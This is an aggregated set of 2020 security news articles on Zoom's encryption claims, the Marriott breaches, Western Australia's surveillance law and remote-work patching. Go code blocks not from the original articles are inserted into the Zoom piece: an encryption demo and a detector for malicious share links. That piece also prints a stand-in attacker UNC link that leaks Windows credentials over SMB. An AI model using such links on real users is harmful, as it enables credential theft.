STE WILLIAMS

Australian state will install home surveillance hardware to make sure if you’re in virus isolation, you stay there

The State of Western Australia has given itself the power to install surveillance devices in homes, or compel people to wear them, to ensure that those required to isolate during the coronavirus crisis don’t interact with the community.

Not all people will be required to use the devices. State Premier [equivalent to a US governor – ed.] Mark McGowan said they’ll only be used if: “Someone who is directed to self-isolate and fails to comply.”

The law enabling the regime, passed yesterday after very brief debate, is the Emergency Management Amendment (COVID-19 Response) Bill 2020 [PDF]. It outlines the monitoring regime, and the fact that the State Emergency Coordinator has the power to require use of surveillance hardware.

If the Coordinator makes that decision, they have the power to:

  • Direct the person to wear an approved electronic monitoring device.
  • Direct the person to permit the installation of an approved electronic monitoring device at the place where the person resides or, if the person does not have a place of residence, at any other place specified by the officer.
  • Give any other reasonable direction to the person necessary for the proper administration of the electronic monitoring of the person.

Attempts to damage, remove or interfere with the operation of the devices, or refusal to hand one over to authorised officers, can result in a year behind bars, or a fine of AU$12,000 (US$7,400, £5,900).

The Register has learned of smartphone-based surveillance in aid of coronavirus-crimping in Taiwan, Singapore and Hong Kong, plus the UK is clearing policy roadblocks to make it possible. Russia has used facial recognition and public security cameras to detect quarantine-breakers.


But we’ve not found evidence of on-premises or wearable surveillance in any jurisdiction other than Western Australia. We have, however, found one opinion that the state’s actions aren’t out of bounds.

The Nuffield Council on Bioethics, a London-based think tank, has issued a “Guide to the ethics of surveillance and quarantine for novel coronavirus” [PDF]. The guide considers that surveillance to detect symptoms is fine, and also adds the following:

The avoidance of significant harm to others who are at risk from a serious communicable disease may outweigh the consideration of personal privacy or confidentiality, and on this basis it can be ethically justified to collect non-anonymised data about individuals for the purpose of implementing control measures.

However, any overriding of privacy or confidentiality must be to the minimum extent possible to achieve the desired aim.

The Register has asked the Western Australian government to detail the devices it intends to use, and if it has them to hand. We have not received a response to our request at the time of writing and will update this story if we receive any information. ®


Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/04/01/west_australia_isolation/

Zoom’s end-to-end encryption isn’t actually end-to-end at all. Good thing the PM isn’t using it for Cabinet calls. Oh, for f…

UK Prime Minister Boris Johnson sparked security concerns on Tuesday when he shared a screenshot of “the first ever digital Cabinet” on his Twitter feed. It revealed the country’s most senior officials and ministers were using bog-standard Zoom to discuss critical issues facing Blighty.

The tweet also disclosed the Zoom meeting ID was 539-544-323, and fortunately that appears to have been password protected. That’s a good thing because miscreants hijacking unprotected Zoom calls is a thing.

Crucially, the use of the Zoom software is likely to have infuriated the security services, while also raising questions about whether the UK government has its own secure video-conferencing facilities. We asked GCHQ, and it told us that it was a Number 10 issue. Downing Street declined to comment.

The decision to use Zoom, as millions of others stuck at home during the coronavirus outbreak are doing, comes as concerns are growing about the conferencing app’s business model and security practices.

Most notably, the company has been forced to admit that although it explicitly gives users the option to hold an “end-to-end encrypted” conversation and touts end-to-end encryption as a key feature of its service, in fact it offers no such thing.

Specifically, it uses TLS, which underpins HTTPS website connections and is significantly better than nothing. But it most definitely is not end-to-end encryption (E2E). E2E ensures all communications are encrypted between devices so that not even the organization hosting the service has access to the contents of the connection. With TLS, Zoom can intercept and decrypt video chats and other data.

When we say end-to-end…

Despite Zoom offering a meeting host the option to “enable an end-to-end (E2E) encrypted meeting,” and providing a green padlock that claims “Zoom is using an end to end encrypted connection,” it appears that the company is able to access data in transit along that connection, and can also be compelled to provide it to governments. So, it’s not E2E.


While that is not something that will bother most Zoom users, whose conversations are not highly sensitive nor confidential, for something like a UK Cabinet meeting, the lack of true end-to-end encryption is dangerous.

Under questioning, a Zoom spokesperson admitted: “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

Then they gave their own Zoom version of what the phrase “end-to-end encryption” actually means: “When we use the phrase ‘End to End’ in our other literature, it is in reference to the connection being encrypted from Zoom end point to Zoom end point,” a spokesperson told The Intercept on Tuesday.

The use of “end point” in this context refers to Zoom servers, not just Zoom clients; a second layer of purposefully misleading semantics.
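To make the distinction concrete, here is an added Go example (not Zoom’s code, and not from the article) that models both designs with AES-GCM: in the hop-by-hop design each client shares a transport key only with the relay server (what TLS gives you), so the relay decrypts and re-encrypts every frame and can read it; in the end-to-end design the two clients additionally share a media key the relay never receives, so the relay only ever sees ciphertext inside the transport layer. Key agreement is assumed to have happened out of band.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
)

// newKey returns a fresh random 256-bit AES key, standing in for the key a TLS
// handshake (transport hop) or a client-to-client agreement (media key) produces.
func newKey() []byte {
	k := make([]byte, 32)
	if _, err := rand.Read(k); err != nil {
		panic(err)
	}
	return k
}

func gcmFor(key []byte) cipher.AEAD {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		panic(err)
	}
	return gcm
}

// seal encrypts with AES-256-GCM and prepends the random nonce.
func seal(key, plaintext []byte) []byte {
	gcm := gcmFor(key)
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		panic(err)
	}
	return gcm.Seal(nonce, nonce, plaintext, nil)
}

// open reverses seal; it fails on the wrong key or on tampered data.
func open(key, sealed []byte) ([]byte, error) {
	gcm := gcmFor(key)
	ns := gcm.NonceSize()
	if len(sealed) < ns {
		return nil, fmt.Errorf("ciphertext too short")
	}
	return gcm.Open(nil, sealed[:ns], sealed[ns:], nil)
}

// Relay is the conferencing server. It holds one transport key per participant
// (the TLS sessions) and is never given a key the participants agree between themselves.
type Relay struct {
	hopKeys  map[string][]byte
	Observed []byte // whatever the relay could read from the last forwarded frame
}

// Forward terminates the sender's transport encryption, records what it sees,
// and re-encrypts for the recipient's transport. That is all a hop-by-hop design does.
func (r *Relay) Forward(from, to string, frame []byte) ([]byte, error) {
	inner, err := open(r.hopKeys[from], frame)
	if err != nil {
		return nil, err
	}
	r.Observed = append([]byte(nil), inner...)
	return seal(r.hopKeys[to], inner), nil
}

// Participant shares a transport key with the relay and, optionally, a media key
// shared only with other participants (nil means transport-only encryption).
type Participant struct {
	Name     string
	hopKey   []byte
	mediaKey []byte
}

// Send carries one message from p to the recipient through the relay and returns
// what the recipient was able to decrypt.
func (p Participant) Send(relay *Relay, to Participant, msg string) (string, error) {
	payload := []byte(msg)
	if p.mediaKey != nil {
		payload = seal(p.mediaKey, payload) // end-to-end layer, opaque to the relay
	}
	frame, err := relay.Forward(p.Name, to.Name, seal(p.hopKey, payload))
	if err != nil {
		return "", err
	}
	got, err := open(to.hopKey, frame)
	if err != nil {
		return "", err
	}
	if to.mediaKey != nil {
		if got, err = open(to.mediaKey, got); err != nil {
			return "", err
		}
	}
	return string(got), nil
}

// Session sends msg from alice to bob and reports what bob received and whether
// the relay was able to read the message in the clear.
func Session(msg string, endToEnd bool) (delivered string, relayCanRead bool, err error) {
	relay := &Relay{hopKeys: map[string][]byte{"alice": newKey(), "bob": newKey()}}
	alice := Participant{Name: "alice", hopKey: relay.hopKeys["alice"]}
	bob := Participant{Name: "bob", hopKey: relay.hopKeys["bob"]}
	if endToEnd {
		k := newKey() // assumed agreed between the two clients, never sent to the relay
		alice.mediaKey, bob.mediaKey = k, k
	}
	delivered, err = alice.Send(relay, bob, msg)
	return delivered, bytes.Equal(relay.Observed, []byte(msg)), err
}

func main() {
	for _, e2e := range []bool{false, true} {
		got, relayRead, err := Session("cabinet minutes", e2e)
		fmt.Printf("endToEnd=%v delivered=%q relayCanRead=%v err=%v\n", e2e, got, relayRead, err)
	}
}
```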

So when we say user privacy…

That’s not the only area where Zoom has been found wanting. As a spotlight has swung on the biz thanks to its enormous take-up in recent weeks, its dodgy data sharing policies were also revealed.

As we reported earlier this month, Zoom granted itself the right to mine your personal data and conference calls to target you with ads, and seemed to have a “creepily chummy” relationship with tracking-based advertisers.

Personal information gathered by the company included, but was not limited to, names, addresses and any other identifying data, job titles and employers, Facebook profiles, and device specifications. It also included “the content contained in cloud recordings, and instant messages, files, whiteboards … shared while using the service.”

In other words, it was, arguably, the Facebook of the video-conferencing world, sucking every piece of data it can from you and any device you install it on.

Speaking of Facebook, Zoom’s iOS app sent analytics data to Facebook even if you didn’t use Facebook to sign into Zoom, due to the application’s use of the social network’s Graph API, Vice discovered. The privacy policy stated the software collects profile information when a Facebook account is used to sign into Zoom, though it didn’t say anything about what happens if you don’t use Facebook. Zoom has since corrected its code to not send analytics to the social network if you don’t use it to sign into the video-conferencing app.

Zoom also stupidly glommed users together, as if they were working for the same company, because they used a common email provider, such as xs4all.nl.

Privacy advocacy group Access Now, meanwhile, dug into Zoom’s privacy policy and practices and didn’t like what it saw, sending a letter to the company on March 19 asking it to publish a transparency report along the same lines as other companies that made it plain exactly what the company was doing with its users’ data.

“The growing demand for Zoom’s services makes it a target for third parties, from law enforcement to malicious hackers, seeking personal data and sensitive information,” said Access Now’s general counsel Peter Micek. “This is why just disclosing privacy policies is not enough – it’s high time for Zoom to tell us how they protect our personal lives and professional activities from exploitation. This starts with a regular transparency report.”

The Facebook API kerfuffle resulted in a lawsuit [PDF], filed on Monday in California. The plaintiff in this case, Robert Cullen of Sacramento, California, is looking to bring a class action against Zoom for failing to protect personal data.

He argued Zoom has violated three Californian laws: the Unfair Competition Law, Consumers Legal Remedies Act, and Consumer Privacy Act by collecting and providing personal information to third parties including Facebook.

“Had Zoom informed its users that it would use inadequate security measures and permit unauthorized third-party tracking of their personal information, users would not have been willing to use the Zoom app,” the lawsuit argued.

In short, while Zoom’s ease of use, reliability and excellent user interface has made it a godsend for people stuck at home, the company continues to raise red flags about its honesty, its privacy policies and its business model. Something that a country’s head of government would do well to consider before posting screengrabs of online meetings. ®

Stop press… Zoom has quietly rewritten its privacy policy since our earlier coverage to now stress: “We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data.”

It continued: “Your meetings are yours. We do not monitor them or even store them after your meeting is done unless we are requested to record and store them by the meeting host … We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites.”

It, thus, appears to have clarified, among other things, that it, at least now, does not use the content of meetings and messages to generate targeted advertising.

PS: Zoom has an attention-tracking feature, which can be turned on by a meeting host, that alerts the host if you click away from the Zoom conference for more than 30 seconds.

PPS: It appears you can snaffle people’s Windows local login usernames and hashed passwords via Zoom by getting them to click on a URL in a chat message that connects to a malicious SMB file server. A link such as \\evil.server.com\foobar.jpg will, when clicked on, cause Windows to connect to evil.server.com, supplying the logged-in user’s credentials in hope of fetching foobar.jpg.
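From the defender’s side, the useful check is to spot share-style links in chat traffic before anyone clicks them. This is an added Go example, not part of the article or of Zoom: it extracts UNC paths (\\host\share\...) and file:// URLs with a host part from a batch of constructed chat messages and flags those whose host is outside an assumed allowlist of the organisation’s own file servers (corp.example here).

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// uncLink matches the two link shapes Windows resolves to an SMB share:
// a UNC path (\\host\share\file) and a file:// URL with a host part
// (file://host/share/file). Group 1 captures the host.
var uncLink = regexp.MustCompile(`(?i)(?:\\\\|file://)([a-z0-9][a-z0-9.\-]*)(?:[\\/][^\s"'<>]*)?`)

// Finding is one share-style link found in a chat message.
type Finding struct {
	Host    string
	Link    string
	Trusted bool // host is, or sits under, one of the organisation's own file servers
}

// hostTrusted reports whether host equals, or is a subdomain of, a trusted entry.
func hostTrusted(host string, trusted []string) bool {
	h := strings.ToLower(host)
	for _, t := range trusted {
		t = strings.ToLower(t)
		if h == t || strings.HasSuffix(h, "."+t) {
			return true
		}
	}
	return false
}

// ScanMessage extracts every share-style link in msg and marks whether it points
// at a trusted host. Untrusted hosts are the ones worth alerting on: opening them
// makes Windows attempt an SMB connection that carries the user's credentials.
func ScanMessage(msg string, trusted []string) []Finding {
	var out []Finding
	for _, m := range uncLink.FindAllStringSubmatch(msg, -1) {
		out = append(out, Finding{Host: m[1], Link: m[0], Trusted: hostTrusted(m[1], trusted)})
	}
	return out
}

// UntrustedShareLinks runs ScanMessage over a batch of messages and returns only
// the links that point outside the trusted file servers.
func UntrustedShareLinks(msgs []string, trusted []string) []Finding {
	var out []Finding
	for _, msg := range msgs {
		for _, f := range ScanMessage(msg, trusted) {
			if !f.Trusted {
				out = append(out, f)
			}
		}
	}
	return out
}

// sampleChat is constructed sample traffic, not real messages. The hostnames are
// the article's placeholder and an assumed internal file server.
var sampleChat = []string{
	`here's the deck: https://example.com/slides.pdf`,
	`updated minutes at \\fileserver.corp.example\minutes\2020-04.docx`,
	`lol check this \\evil.server.com\foobar.jpg`,
	`mirror: file://evil.server.com/share/foobar.jpg`,
}

// trustedServers is an assumed allowlist of the organisation's own file servers.
var trustedServers = []string{"corp.example"}

func main() {
	for _, f := range UntrustedShareLinks(sampleChat, trustedServers) {
		fmt.Printf("ALERT untrusted share link host=%s link=%q\n", f.Host, f.Link)
	}
}
```

On the endpoint side, blocking outbound SMB (TCP 445) at the perimeter and the Windows policy “Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers” address the same exposure regardless of which chat client delivers the link.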


Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/04/01/zoom_spotlight/

Singapore government scraps physical 2FA tokens for government services

Singapore will bin the physical tokens used to provide two-factor authentication (2FA) for some digital government services.

The city-state operates “SingPass”, a government service that connects Singapore’s residents with 200 government services. SingPass helps residents to file taxes, apply for public housing, or check the balance of their pension accounts.

In 2016, the government enabled two-factor authentication (2FA) for SingPass accounts to improve security. The measures required users to input a code from a physical “OneKey” token in addition to their regular password to access their accounts.

But today the government announced plans to scrap the physical tokens, which account for only two per cent of logins. New tokens and replacements will no longer be issued from October, and they will stop working entirely from April next year, the government said.

The government is instead encouraging users to use the SingPass Mobile app, which was released in 2018. The app uses fingerprint, face recognition, or a six-digit passcode to grant access and, together with SMS 2FA, accounts for 98 per cent of logins.

In addition to the regular government services, SingPass Mobile also allows users to access selected private sector services, such as insurance and the grants portal on the Singapore National Employers Federation website.

Users who cannot use the app can continue to access the online services by setting up SMS 2FA, which will send a code to their mobile phones, or visit one of the 46 SingPass retail outlets across the island.

But the app is preferred. As it should be, given 2015 advice from the United States’ National Institute of Standards and Technology that SMS 2FA is not sufficiently secure.

Kok Ping Soon, chief exec of Singapore’s digital transformation team, GovTech, said: “The SingPass Mobile app is key to Singapore’s national digital identity initiative. We are encouraged by the strong support so far and will do more to promote the use of the app, so that more users can transact online with the government and private sector easily and conveniently.”

“We will also work with our partner agencies to help more citizens learn how to use SingPass Mobile, and continue to find new solutions which ensure security and convenience for our citizens.” ®


Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/04/01/singapores_government_scraps_physical_tokens/

Marriott Hotels hacked AGAIN: Two compromised employee logins abused to siphon off guests’ personal info

Marriott Hotels has suffered its second data spillage in as many years after an “unexpected amount” of guests’ data was accessed through two compromised employee logins, the under-fire chain has confirmed.

The size of the latest data exposure has not been disclosed, though Marriott admitted it seemed to have started in January 2020 and was detected “at the end of February.”

“We identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property,” said Marriott, without identifying which of its 6,900 hotels worldwide was at the epicenter of the intrusion.

“Upon discovery, we confirmed that the login credentials were disabled, immediately began an investigation, implemented heightened monitoring, and arranged resources to inform and assist guests,” it continued.

Marriott did not explain why it took four weeks to begin alerting customers about the digital break-in.

Stolen data included name, postal and email addresses, phone numbers, Bonvoy loyalty card balance, gender, date of birth, linked loyalty scheme information from other companies and room/personal preferences.

The hotel chain asserted that credit card data, PINs, passport and driver’s licence information was not accessed by the hackers, whose identities are so far unknown.

Bob Rudis of infosec biz Rapid7 commented: “The use of stolen, legitimate credentials is still one of the most popular attack vectors for our adversaries. It is also paramount that you continue to watch for anomalous behaviour of systems and accounts to reduce the time attackers have to accomplish their goals if they do manage to breach your defences.”

Guests are now being emailed from [email protected], with the company publishing a self-help portal so you can, er, input your personal data to find out whether it was exposed or not. A link is available from the Marriott security breach notification page. For affected Brits, an 0800 number is provided so one can bellow enraged obscenities at some call centre drone, er, obtain further information.

Free Experian identity monitoring is also being provided to those affected. The idea of this is to notify you if criminals are using your stolen details to clone your identity.

If you are involved, Marriott said in its statement it would force password resets and prompt users to enable multi-factor authentication.

Back in 2018 Marriott lost control of 383 million people’s personal data after China-based criminals broke into its Starwood brand’s guest database. Included in that hack were 8.6 million “encrypted” credit card numbers, though the hotel chain insisted that all but a mere 354,000 had expired by the time staff realised what had happened.

The data spillage will come as bad news for Marriott’s lawyers and beancounters, who thought they had been successful in kicking the UK ICO’s £99m fine for the 2018 breach into the long grass. And lest we all forget, in 2014 the hotel chain was caught red-handed blocking guests’ own Wi-Fi hotspots in a vain attempt to force them to buy expensive hotel Wi-Fi access instead. ®


Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/03/31/marriott_hotels_hacked_again/

Epic Games floats $1m bounty to ID source of ‘commercial smear’ claiming Houseparty chat app has been hacked

Group video chat app Houseparty has offered a $1m bounty to identify what it claims is an organised campaign to falsely depict it as a hackers’ backdoor.

Announced at 4am UTC on the firm’s Twitter account, the million-dollar bounty is being offered to “the first individual to provide proof of such a campaign,” with Epic Games, the firm behind Houseparty, alleging this effort is “a paid commercial smear… to harm Houseparty.”

The app has exploded in popularity since most of the world entered coronavirus lockdown as a replacement for interacting within venues such as pubs, coffee shops and restaurants. Most people use it to livestream themselves drunkenly trying out filters that turn their fizzogs into cartoon dogs and so on.

Over the last few days, rumours have been seeded on Twitter that Houseparty is linked to people’s online accounts being hacked. The ever-reliable online wing of the Daily Mail gathered together a slack handful of tweets alleging Houseparty was the cause of account compromises. El Reg had a quick look at the first account mentioned in the Mail writeup and discovered a Twitter thread where the account operator cheerfully admitted to reusing usernames and passwords across different sites: an obvious path to multi-account compromise.

While The Register is not aware of any genuine concerns over Houseparty, these particular rumours do seem short of the mark. Bored readers trapped at home might enjoy using some social media verification techniques (PDF, 79 pages, dates back to 2016 but the basics are sound) to check out more of the same.

“We’ve found no evidence to suggest a link between Houseparty and the compromises of other unrelated accounts,” a spokesperson for Epic Games told the BBC.

Bounties are vanishingly rare these days in the corporate tech world, normally being restricted to governmental prosecutors trying to lay hands on overseas criminals, as with US Federal prosecutors who want to arrest two Russians allegedly behind an online malware operation. ®


Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/03/31/houseparty_bounty_1m_dollars_commercial_smear_claim/

Patching Poses Security Problems with Move to More Remote Work

Security teams were not ready for the wholesale move to remote work and the sudden expansion of the attack surface area, experts say.

A growing body of survey data suggests that the move to remote work has caused a growing number of headaches for security teams, especially regarding securing remote systems and maintaining up-to-date software through patching. 

In mid-March, 45% of companies encouraged workers to move to remote working, up from only 13% of companies in 2018, according to IT community Spiceworks. Yet security teams consider their company’s capability to patch remote systems to be inadequate, according to a recent study released by Automox, a cyber-hygiene tools provider. While 48% of security teams patch on-premises desktops and laptops in the first three days, that declines to 42% for remote desktops and laptops, according to the firm.

“Remote desktops usually play second fiddle in terms of patching and prioritization — it’s usually more difficult to manage them,” says Chris Hass, director of information security and research for Automox. “Most teams have a good idea of what is going on with the corporate machines, but they often don’t have any visibility into remote workers’ systems, so there absolutely has been a large increase in the attack surface because of remote work.”

A major impact on businesses from the coronavirus pandemic is the speed with which companies have moved to remote working, changing the way that employees access business applications and increasing the potential attack surface area — a particular headache for IT security. 

Most companies were not prepared for such a broad-based move to working remotely. While, on the whole, anywhere from 56% to 62% of employees could work from home, according to remote work analyst Global Workplace Analytics, only 14% of companies were prepared to handle a significant crisis and move the workforce to remotely access software and applications, according to a survey by Spiceworks of IT professionals.

Because companies were taken by surprise, most are not prepared to patch and attest to the security of remote systems, says AJ Singh, co-founder and vice president of product management for remote management services firm NinjaRMM.

“Remote work has absolutely increased the complexity and scale of patch management in organizations,” he says. “Now, in addition to maintaining and patching servers and devices on-prem, IT professionals must also manage the devices used by remote workers, making sure they are secure before accessing a business’s data.”

Patching is already an expensive proposition, with hundreds and thousands of vulnerabilities affecting a business’s software and systems, says Sumedh Thakar, president and chief product officer at Qualys. The only way for most companies to deal with the issue is to prioritize the vulnerabilities based on the criticality of the assets affected by the issues. For example, companies should only focus on the BlueKeep vulnerability if they have Remote Desktop Protocol (RDP) services in place.

However, the move to remote work has changed the calculus of prioritization for many companies and reduced their visibility, he says.

“It is becoming immediately clear that traditional enterprise security solutions deployed inside the organization’s network are completely ineffective in patching [and] remediating these remote endpoints due to the pressure they would put on VPN concentrators, bandwidth for deploying patches or sheer amount of time they would put to tweak these solutions,” Thakar says, adding: “Now, prioritization based on risk becomes interesting because vulnerabilities critical for these remote endpoints are probably different than those posing risk to traditional server farms.”

Automation is another critical tool for better handling the patching of remote workers’ systems. To get patching under control, businesses need to have the right tools in place to automate large parts of the patching process, says NinjaRMM’s Singh.

“Ultimately, companies need to accept the fact that patch management is a constant chore regardless of remote work or working in an office,” he says. “For the foreseeable future, however, it will be more important than ever to make sure end users’ machines are tightly secured to avoid any loss or breach of sensitive data.”

For vendors, the move to extensive remote working may result in significant business. While 44% of companies had already committed to spending more on IT in 2020, now 39% have further increased their budgets, according to Spiceworks.

And remote working is the area most in need of improvement, the survey found. Almost all — 92% — of IT professionals are concerned about the security of company-owned devices used from home and connecting to a home network.


Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline …

Article source: https://www.darkreading.com/vulnerabilities---threats/vulnerability-management/patching-poses-security-problems-with-move-to-more-remote-work/d/d-id/1337451?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Why Third-Party Risk Management Has Never Been More Important

Given today’s coronavirus pandemic, the need for companies to collect cybersecurity data about their business partners is more critical than ever. Here’s how to start.

Over recent weeks, the ongoing spread of the COVID-19 coronavirus has forced companies around the country to make difficult decisions about how to protect their employees — as well as their communities as a whole.

In an effort to halt the spread of the virus, many organizations are instituting mandatory work-from-home (WFH) policies, engaging with new cloud service providers, and shifting resources toward supporting an expanding remote workforce. In responding to real business needs, they now face a variety of new, complex cybersecurity challenges from an expanding attack surface — both internally and within their third-party networks.

Work from Home Insecure External Networks
Under the best of circumstances, it’s difficult for security teams to enforce stringent controls and policies when employees are operating from disparate locations on various networks and devices. In the wake of COVID-19, with newly remote home workers logging on to unpatched machines through unsecured Wi-Fi networks that haven’t connected to the corporate VPN in days or weeks, the dangers are even greater.

In fact, new concerns about “external network” security have become top of mind for security teams. The National Institute of Standards and Technology recently issued an urgent bulletin outlining challenges and best practices, suggesting that “organizations should also assume that communications on external networks, which are outside of the organization’s control, are susceptible to eavesdropping, interception, and modification.” Organizations are now seeking to better understand the security posture of the external network.

Compounding this challenge, opportunistic hackers are taking advantage of the ongoing fear to target individuals with phishing emails that appear to come from an official source, such as the Centers for Disease Control (CDC). These emails contain a malware-ridden attachment that infects the computer in question and steals the individual’s personal information. These risk factors are hard to assess and mitigate in your own organization — and even more difficult to monitor when it comes to third- and fourth-party networks, where you have less visibility and control.

Vendor Assessment and COVID-19
Given the current coronavirus pandemic, the need for companies to collect cybersecurity data about their vendors has never been more critical. That being said, recent travel bans and widespread WFH policies prevent on-site evaluations from being a viable option, completely upending traditional ways of assessing third-party risk. In addition, organizations that have previously leveraged consultants to aid in evaluation processes will now need to rethink their approach because most consultants will no longer be traveling, at least for the short and medium term.

Of course, existing or new manual assessment processes will be slower and more stressful due to the challenges that come with a newly remote workforce, not to mention a reduced access to the latest technology, such as video conferencing for brainstorming sessions and planning meetings that will be increasingly difficult when everyone is in a different location and relying on potentially flawed home Wi-Fi networks.

To promote efficient and effective vendor assessment and onboarding processes in these conditions, it’s critical to streamline and automate wherever possible. Many organizations will need to completely rethink their assessment schedule and policy to include more remote monitoring capabilities. By leveraging a dynamic, standardized cyber-risk key performance indicator (KPI), like security ratings to assess each potential vendor’s security posture side-by-side, you can immediately identify areas of risk that require attention — and make data-driven evaluation decisions under the limited remote resources you have today due to the coronavirus. [Disclosure: The author is an executive of a company that provides security ratings to help companies evaluate third-party risk.]

Developing Remediation Contingencies
Once a vendor has been onboarded, it’s critical to continuously monitor their security posture to ensure they’re maintaining the previously agreed-upon risk thresholds. As security ratings are updated on a daily basis, you can easily leverage this data to track any security shifts in your third-party network from your remote working location.

Of course, monitoring only goes so far. If you identify critical vulnerabilities that pose a risk to your ecosystem, you need to have a remediation plan in place. That being said, in this brave new world of mandated WFH policies, your previously agreed-upon plans will likely need to be reassessed and updated.

As part of your third-party risk management initiative, make sure you align how your current vendors will handle any security issues that arise within your remote workforce over the coming weeks and months. For instance, you should confirm that they have a plan in place to resolve any data center vulnerabilities, given that no employees will likely be permitted to travel there.

As is the case whenever you update vendor security expectations, make sure that any and all contingencies are documented in writing and agreed upon. Outline the preferred forms of communication and be as specific as possible when defining time frame expectations. For instance, you may require that vendors inform you of any breaches within 24 hours and remediate any security issues within 48 hours.

Closing the Security and Communication Gaps
During these uncertain times, it’s more important than ever to be proactive and vigilant when it comes to your organization’s cybersecurity. Don’t let a security incident be the first time you reconnect with your third parties about new processes and standards you need to implement during this global crisis. As the workforce goes remote and new targeted threats become increasingly prevalent, it’s critical to have a plan in place to continuously evaluate and manage both your security posture and that of your vendor ecosystem.

Of course, given the current resource restrictions and unprecedented stress on the overall digital supply chain, all organizations will need to start by reassessing (and potentially overhauling) their existing policies and procedures. In many ways, this is uncharted territory, and no security leader is going to have all the right answers immediately. You must be willing to think outside of the box to accomplish your responsibilities, support your team, and protect your network in this new and evolving risk environment.


Jake Olcott is vice president at BitSight Technologies, where he helps organizations benchmark their cybersecurity programs using quantitative metrics. Olcott speaks and writes about the role of directors, officers and executives in cyber-risk management. He served as …

Article source: https://www.darkreading.com/risk/why-third-party-risk-management-has-never-been-more-important/a/d-id/1337431?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Latest Security News & Commentary about COVID-19

Check out Dark Reading’s updated, exclusive news and commentary surrounding the coronavirus pandemic.

3/31/2020
Patching Poses Security Problems with Move to More Remote Work
Security teams were not ready for the wholesale move to remote work and the sudden expansion of the attack surface area, experts say

3/31/2020 
Why Third-Party Risk Management Has Never Been More Important
Given today’s coronavirus pandemic, the need for companies to collect cybersecurity data about their business partners is more critical than ever. Here’s how to start.

3/31/2020
Limited-Time Free Offers to Secure the Enterprise Amid COVID-19
These products and services could be of immediate help to infosec pros now protecting their organizations while working from home.

3/27/2020
Purported Brute-Force Attack Aims at Linksys Routers as More People Work Remotely
The attack takes control of poorly secured network devices, redirecting Web addresses to a COVID-themed landing page that attempts to fool victims into downloading malware.

3/26/2020
How Zoom, Netflix, and Dropbox are Staying Online During the Pandemic
Inside the efforts to keep the quarantined world’s popular Internet services running smoothly.

3/25/2020
COVID-19: Getting Ready for the Next Business Continuity Challenge
What comes after you’ve empowered your remote workforce in the wake of the coronavirus pandemic? Dealing with a large portion of that workforce getting sick at the same time.

3/24/2020
Cybercriminals’ Promises to Pause During Pandemic Amount to Little
As the pandemic worsens, online profiteering, from fraudsters to ransomware operators to cybercriminal hacking, continues unabated, despite some promises from the underground.

3/23/2020  
FBI Warns of Fake CDC Emails in COVID-19 Phishing Alert
Fraudsters exploit concerns by claiming to offer virus-related information or promising stimulus checks.

3/23/2020  
8 Infosec Page-Turners for Days Spent Indoors
Stuck inside and looking for a new read? Check out these titles written by security practitioners and reporters across the industry.

3/20/2020 
Attack Surface, Vulnerabilities Increase as Orgs Respond to COVID-19 Crisis
In typical fashion, attackers are gearing up to take advantage of the surge in teleworking prompted by the pandemic.

3/19/2020
DDoS Attack Targets German Food Delivery Service
Lieferando delivers food from more than 15,000 restaurants in Germany, where people under COVID-19 restrictions depend on the service.

3/19/2020
VPN Usage Surges as More Nations Shut Down Offices
As social distancing becomes the norm, interest in virtual private networks has rocketed, with some providers already seeing a doubling in users and traffic since the beginning of the year.

3/17/2020 
Attorney General Directs DoJ to Prioritize Coronavirus Crime
Criminal activity related to the pandemic cannot be tolerated, William Barr states in memo.

3/17/2020 
Security Lessons We’ve Learned (So Far) from COVID-19
Takeaways about fighting new fires, securely enabling remote workforces, and human nature during difficult times.

3/16/2020 
Privacy in a Pandemic: What You Can (and Can’t) Ask Employees
Businesses struggle to strike a balance between workplace health and employees’ privacy rights in the midst of a global health emergency.

3/12/2020 
Working from Home? These Tips Can Help You Adapt
COVID-19 means many people are doing their jobs from outside the confines of the office. That may not be as easy as it sounds.

3/9/2020 
Malware Campaign Feeds on Coronavirus Fears
A new malware campaign that offers a “coronavirus map” delivers a well-known data-stealer.


Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/operations/latest-security-news-and-commentary-about-covid-19/d/d-id/1337452?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Data from 5.2M Marriott Loyalty Program Members Hit by Breach

The data was breached through the credentials of two franchisee employees.

Marriott International has notified some 5.2 million guests that their personal information could have been accessed in the breach of an internal application used to help provide guest services. According to the company, the breach was active from mid-January until the end of February of this year.

The information involved in the leak is part of the data kept on guests as part of Marriott’s Bonvoy loyalty program. The affected information includes contact details (such as name, mailing address, email address, and phone number), loyalty account information (including account number and points balance, but not passwords), additional personal details (such as company, gender, and birthday day and month), partnerships and affiliations (including linked airline loyalty programs and numbers), and preferences (for example, stay/room preferences and language preference). Marriott noted that no account passwords or PINs, payment card information, passport information, national IDs, or driver’s license numbers were part of the breached data.

In the breach notification, Marriott said that the unauthorized access came through the credentials of two employees at a franchise location. The company is offering a year of identity monitoring to all affected guests.

For more, read here.



